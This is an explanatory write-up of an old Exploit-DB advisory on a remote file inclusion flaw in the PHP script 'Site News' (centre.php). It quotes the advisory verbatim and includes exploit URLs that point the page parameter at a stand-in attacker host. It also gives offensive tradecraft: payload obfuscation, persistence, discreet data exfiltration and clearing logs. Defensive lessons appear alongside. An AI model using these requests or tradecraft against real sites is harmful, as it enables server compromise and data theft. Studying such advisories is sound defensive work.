Understanding Site News 'centre.php' Remote File Inclusion

What this paper is

This paper describes a critical vulnerability in a web application called "Site News". The vulnerability is a Remote File Inclusion (RFI) flaw, meaning an attacker can trick the web application into including and executing arbitrary files from a remote server. The paper provides a simple explanation of the flaw and an example of how to exploit it.

Simple technical breakdown

The core of the vulnerability lies in how the centre.php file handles a variable named $page.

• If $page is empty, it includes a default file accueil.php.
• If $page is not empty, it includes whatever is provided in $page and appends .php to it.

The problem is that the application doesn't properly sanitize or validate the input for $page. An attacker can provide a URL to a file on their own server (e.g., http://attacker.com/malicious.txt) as the value for $page. The application will then try to include http://attacker.com/malicious.txt.php. If the attacker controls the remote file and can make it executable or contain malicious PHP code, this can lead to code execution on the victim's server.

Complete code and payload walkthrough

The paper highlights a specific code snippet from centre.php:

<?

  if (empty($page))
   {
        include("accueil.php");
   }
     else
   {
       include($page.".php");
   }

?>

Let's break this down:

• <? ... ?>: This denotes a PHP code block.
• if (empty($page)): This checks if the variable $page is empty (i.e., it has no value or is set to NULL).
  • include("accueil.php");: If $page is empty, the script includes the local file accueil.php. This is the default behavior.
• else: If $page is not empty, the code inside this block executes.
  • include($page.".php");: This is the vulnerable part. It takes the value of $page, concatenates it with the string .php, and then attempts to include that file.

Example exploitation scenario:

The paper provides an example:
http://www.victime.com/(path)/centre.php?page=http://attacker

Mapping of code fragment to practical purpose:

• if (empty($page)): Defines the default behavior when no specific page is requested.
• include("accueil.php");: Executes the default page.
• else { include($page.".php"); }: This is the core of the vulnerability. It allows external input to dictate which file is included, leading to RFI if the input is a remote URL.

Payload Explanation (Conceptual):

The paper doesn't provide explicit shellcode bytes. Instead, it describes the mechanism of the exploit. The "payload" in this context is the content of a remote file that the attacker hosts.

1. Attacker hosts a malicious file: The attacker creates a file (e.g., shell.txt or backdoor.php) on their own web server. This file contains PHP code that, when executed, performs malicious actions (e.g., a web shell, command execution).
2. Attacker crafts a request: The attacker sends a request to the vulnerable centre.php script, providing the URL of their malicious file as the $page parameter. For example:
   http://victim.com/site_news/centre.php?page=http://attacker.com/shell
3. Vulnerable server processes the request: The centre.php script receives the request. Since $page is not empty, it executes include($page.".php");.
4. Inclusion and execution: The script attempts to include http://attacker.com/shell.php. If the web server is configured to allow remote includes and the attacker's file is accessible and contains valid PHP, the code within http://attacker.com/shell.php will be executed on the victim's server.

Unknowns:

• The exact content of the malicious file (shell.txt or similar) is not specified in the paper.
• The specific configuration of the victim's web server (e.g., allow_url_fopen setting in php.ini) that would enable remote includes is not detailed.

Practical details for offensive operations teams

• Required Access Level: Low. This is a web application vulnerability, exploitable via HTTP requests. No prior authentication or local access is typically required.
• Lab Preconditions:
  • A target web server running the vulnerable "Site News" application.
  • The allow_url_fopen directive must be enabled in the target server's php.ini configuration. This is crucial for PHP to be able to include remote files.
  • The attacker needs a web server to host the malicious payload.
• Tooling Assumptions:
  • A web browser for manual testing or crafting requests.
  • Tools like curl or Burp Suite for sending crafted HTTP requests.
  • A simple HTTP server (e.g., Python's http.server, Apache) to host the payload.
• Execution Pitfalls:
  • allow_url_fopen disabled: If this PHP setting is disabled on the target server, RFI will not work. The server will likely return an error or refuse to fetch the remote file.
  • Firewall/Network Restrictions: The target server might be configured to block outbound connections to arbitrary external IP addresses, preventing it from fetching the remote payload.
  • Input Sanitization (Partial): Some web servers or application frameworks might perform basic sanitization that could interfere with certain payload delivery methods. The paper implies a lack of sanitization for this specific vulnerability.
  • Path Traversal vs. RFI: This exploit is specifically RFI. If the application were vulnerable to Local File Inclusion (LFI), the technique would be different (e.g., using ../../etc/passwd).
  • Payload Extension: The exploit relies on appending .php. If the attacker's payload is not a .php file (e.g., it's a .txt file with PHP code), the server might try to include http://attacker.com/shell.txt.php, which would likely fail unless the attacker's server is configured to serve .txt files as PHP. A common workaround is to name the payload .php on the attacker's server and craft the request accordingly, or to use techniques that bypass the .php extension.
• Tradecraft Considerations:
  • Reconnaissance: Identify the target application and its version. Look for common web application vulnerabilities.
  • Payload Hosting: Ensure the payload is hosted on a reliable server that is accessible from the target. Use a domain that doesn't immediately raise suspicion if possible.
  • Obfuscation: For more advanced scenarios, consider obfuscating the payload to evade basic signature-based detection.
  • Post-Exploitation: Once code execution is achieved, immediately establish persistence and exfiltrate data discreetly. Clean up logs if possible.

Where this was used and when

• Context: This vulnerability was found in the "Site News" web application, a script likely used by small websites or individuals to manage news articles.
• Approximate Year: The exploit was published on November 23, 2006. Therefore, its exploitation would have occurred around this time and potentially in the years immediately following, until the vulnerability was patched by the vendor or the application fell out of use.

Defensive lessons for modern teams

• Input Validation is Paramount: Never trust user input. All external data, especially that used in file operations (like include, require, fopen), must be rigorously validated and sanitized.
• Disable allow_url_fopen and allow_url_include: These PHP directives are often unnecessary for legitimate application functionality and are a primary enabler of RFI. Disabling them significantly reduces the attack surface.
• Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. This limits the damage an attacker can do even if they achieve code execution.
• Web Application Firewalls (WAFs): WAFs can help detect and block malicious requests containing patterns indicative of RFI attempts (e.g., URLs in GET parameters).
• Regular Patching and Updates: Keep all web applications and their dependencies updated to the latest secure versions.
• Secure Coding Practices: Train developers on secure coding principles, including avoiding insecure functions and understanding common vulnerabilities like RFI and LFI.
• Network Segmentation and Egress Filtering: Restrict outbound network access from web servers to only necessary destinations. This can prevent a compromised web server from connecting to an attacker's C2 infrastructure.

ASCII visual (if applicable)

This vulnerability can be visualized as a direct path from external input to file inclusion.

+-----------------+      +-----------------+      +-------------------+
| Attacker Server |----->| Victim Web      |----->| Vulnerable        |
| (Hosts Payload) |      | Server          |      | centre.php script |
+-----------------+      +-----------------+      +-------------------+
        ^                                                   |
        |                                                   |
        | 1. Attacker sends request with URL                | 2. script includes remote file
        |    e.g., ?page=http://attacker.com/shell.php     |    (if allow_url_fopen enabled)
        |                                                   |
        +---------------------------------------------------+
                                                            |
                                                            v
                                                    +-----------------+
                                                    | Malicious Code  |
                                                    | Executed on     |
                                                    | Victim Server   |
                                                    +-----------------+

Source references

• Paper ID: 2833
• Paper Title: Site News - 'centre.php' Remote File Inclusion
• Author: DaDIsS
• Published: 2006-11-23
• Keywords: PHP, webapps
• Paper URL: https://www.exploit-db.com/papers/2833
• Raw URL: https://www.exploit-db.com/raw/2833

Original Exploit-DB Content (Verbatim)

#===================================================================================#
#
# Site News => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Site News
# Url : http://dvmet.free.fr/script/site_news.zip
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in centre.php file that contain this code :
# 
# <?
#
#   if (empty($page))
#    {
#         include("accueil.php");
#    }
#      else
#    {
#        include($page.".php");
#    }
#
# ?>
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#

# milw0rm.com [2006-11-23]